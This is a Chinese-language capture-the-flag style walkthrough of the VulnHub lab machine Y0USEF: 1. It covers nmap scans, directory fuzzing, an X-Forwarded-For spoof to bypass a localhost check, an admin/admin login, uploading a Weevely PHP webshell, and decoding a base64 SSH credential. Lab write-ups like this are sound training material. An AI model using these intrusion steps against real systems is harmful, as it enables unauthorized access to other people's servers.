vulnhub 靶机练习(一)

XTTF 2021年02月14日 143次浏览

这次练习的靶机名称为Y0USEF: 1,有两个flag

首先找到靶机的IP地址,通过使用nmap找到IP地址为192.168.0.104

nmap -sP 192.168.0.0/24

Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-14 11:27 CST
Nmap scan report for 192.168.0.1
Host is up (0.0097s latency).
Nmap scan report for 192.168.0.102
Host is up (0.040s latency).
Nmap scan report for 192.168.0.104
Host is up (0.00056s latency).
Nmap scan report for 192.168.0.109
Host is up (0.0017s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.16 seconds

对端口进行探测,发现开着80和22端口,且组件信息也搜集到了

nmap -v -A 192.168.0.104

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d8:e0:99:8c:76:f1:86:a3:ce:09:c8:19:a4:1d:c7:e1 (DSA)
|   2048 82:b0:20:bc:04:ea:3f:c2:cf:73:c3:d4:fa:b5:4b:47 (RSA)
|   256 03:4d:b0:70:4d:cf:5a:4a:87:c3:a5:ee:84:cc:aa:cc (ECDSA)
|_  256 64:cd:d0:af:6e:0d:20:13:01:96:3b:8d:16:3a:d6:1b (ED25519)
80/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

打开80端口,页面显示了Sorry , the site is under construction soon, it run 看来需要对目录进行Fuzz了

使用ffuf进行跑目录,跑到一个301,这里吐槽下干嘛设计这么个目录,跑了一下午

访问下,发现没有访问权限

使用burp进行抓包,发现缺少XFF头,考虑到可能只有本机可以访问,即加入

X-Forwarded-For: 127.0.0.1

发现可以成功返回200,使用插件simple-modify-headers添加信息,访问网址,尝试使用admin/admin成功登录系统


这里发现有上传功能,使用kali自带的PHP webshell工具Weevely

weevely generate xttf test.php

上传webshell成功,拿到shell


在home目录下发现存在user.txt

www-data@yousef-VirtualBox:/home $ cat user.txt
c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=

拿到ssh密码

拿到第一个flag

拿到第二个flag